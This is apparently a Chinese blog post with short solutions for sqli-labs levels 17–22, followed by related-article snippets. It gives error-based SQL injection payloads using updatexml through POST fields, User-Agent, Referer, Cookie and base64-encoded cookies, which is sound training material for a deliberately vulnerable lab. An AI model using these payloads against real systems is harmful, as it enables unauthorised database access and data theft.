sqlilab 17-22简略版

最新推荐文章于 2024-05-25 10:36:41 发布
最新推荐文章于 2024-05-25 10:36:41 发布
阅读量316 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45491497/article/details/107673278
版权

1.POST update注入(17关)

爆出数据库的版本,1' or updatexml (1,concat(0x7e,version(),0x7e),1) #

2.Header报错 (18关)

在UA末尾添加'报错,存在注入点

注入语句:1',1,updatexml(1,concat(0x7e,database(),0x7e),1)) #

爆出数据库为security

 

3.Referer(19关)

在Referer末尾加单引号,报错

Referer: 1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

4.cookie(20关)

在原始界面输入内容返回如下,尝试抓包后在cookie后注入

Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

 5.BASE64转码(21关,22关更换为双引号)

输入用户名和密码为admin后显示为YWRtaW4=

通过burp suite转码后结果为admin

所以我们将注入的语句通过base64进行编码,复制到cookie参数后面

 如下,就可以看到库名了

吟缺斯汀
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlilabs第17
wh1sper、的博客
04-29 1145
sqlilabs第17关一、分析二、手注 一、分析 这关题目叫做基于报错的更新查新。 遇事不决,就直接看源码。 通过源码我们得知当我们输入数据进去时,会先查询users表与我们输入进去的用户名对比。 如果没有这个用户,就会告诉你。(这肯定忍不了) 相反他会检查用户名。 在check_input中,我贴了函数的链接,师傅们比我总结的详细。 get_magic_quotes_gpc()函数 ctype_digit()函数 二、手注 ...
sqli-labs 第十七关
qq_64302290的博客
05-13 909
(2)当前面的输入的密码 为整数时,之所以可以被执行,是因为当我们输入的为整数时相当与给后面的语句加上了一个括号,并且有限执行括号中的内容。可以发现,这里使用update语句来修改用户的密码,并且对我们输入的用户名进行了过滤但并没有对密码进行过滤。大家可以看到在最后注入具体值的时候我们使用的是floor进行注入,是因为当我们使用updatexml进行注入时会爆下面的问题: 等我查阅资料后回来改正。经过我们的测试,当在密码出输入一个单引号时就会出现报错,对此注入点可能就在该位置。我们接着上面测试注入表名。
sqli-labs(18)
最新发布
2302_78903258的博客
05-25 331
这里最重要的是第5点,简单来说我们可以在user-agent里进行注入,但注入的参数要符合sql 语句的要求,所以我们在user-name里注入的参数有3个,并且要对uagent参数进行闭合。: 这是一个SQL查询语句,目的是从名为'users'的表格中选择用户名和密码与用户输入匹配的行。首先,随便输入账号密码,然后进行抓包,当页面显示uagent的时候,我们可以想到uagent注入。: 这是一个SQL插入语句,将用户代理、IP地址和用户名插入到名为'uagents'的表格中。
sqli-labs第十七关详解
金 帛的博客
04-26 4104
sqlilabs第十七关详解
sqli-lab less-17
qq_45455136的博客
07-14 369
sqli-lab less-17报错注入extractvalue()updatexml()盲注+sqlmap less-17的提示是可注入的sql语句update,注入类型为字符型,传参方式为post。 php中对uname进行了特殊符号过滤并且限制了长度,无法通过select处的uname来进行注入,只能通过update处的passwd来进行注入。通过查看php发现能输出mysql错误信息,可以进行报错注入。 报错注入 extractvalue() 语法:extractvalue(目标xml文档,xml
SQLi Labs Lesson17
1ame的博客
08-15 1147
Lesson - 17 Update Query - Error Based - String 首先进入欢迎界面: 本页面的作用是重置用户的密码。 本节对注入有过滤。 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = sub
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
sqli-labs第十七关
yuqnqi的博客
05-09 286
查看源码,发现uname被检查了,passwd没有被检查 ,所以尝试使用通过passwd参数进行注入测试。
sqli-labs 17
m0_69548793的博客
08-27 1315
sqli-labs 17
sqli-labs靶场17关(基于post的更新查询报错注入)
qq_46527080的博客
12-18 721
知识点 updatexml()函数 updatexml()函数与extractvalue()类似,是更新xml文档的函数。 语法updatexml(目标xml文档,xml路径,更新的内容) updatexml(XML_document,XPath_string,new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:Xpath_String(Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条
sqlilab-writeup(L1-17)
小飒的博客
08-07 233
Less-1 常规的联合注入 http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),(select group_concat(column_name) from information_schema.columns where table_sche
sqlilab学习打卡|手工注入|Less11-Less22
spring!
03-31 1112
sqlilab 通关|Less11-Less22
sqli-labs (less 17)
Xi4or0uji
08-01 476
less 17 报错函数注入 在开始放出payload之前,可能要先稍微提一下 从后台源码可以看出,uname有个check_input函数过滤,但是passwd没有,所以注入点是在passwd上面 接下来还要看下extractvalue这个报错函数 这里推荐一下官方的解释和一篇讲得简单点的博客 https://dev.mysql.com/doc/refman/5.7/en/xml-f...
SQLiLab刷题记录
lonmar的博客
12-09 664
sqli lab 通关手册
sqli-labs第五关sql注入流程(重点讲updatexml函数的特性)
m0_74798594的博客
05-09 534
注:limit 1,1中前面的1可以换0,2,3... 帐号和密码中间的0是为了将二者分别开,没有特殊含义。通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相关的数据。所以这关应该是盲注。加上单引号后,发现会返回报错信息,且可以知道是单引号闭合的,可以考虑使用报错注入。使用报错的sql盲注有很多方法,本文使用updatexml函数的特性来进行报错注入。注:两个1都可以换成任意值不影响,这里主要是利用xpath的语法来爆相关数据。测试id=1,没有显示数据。
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值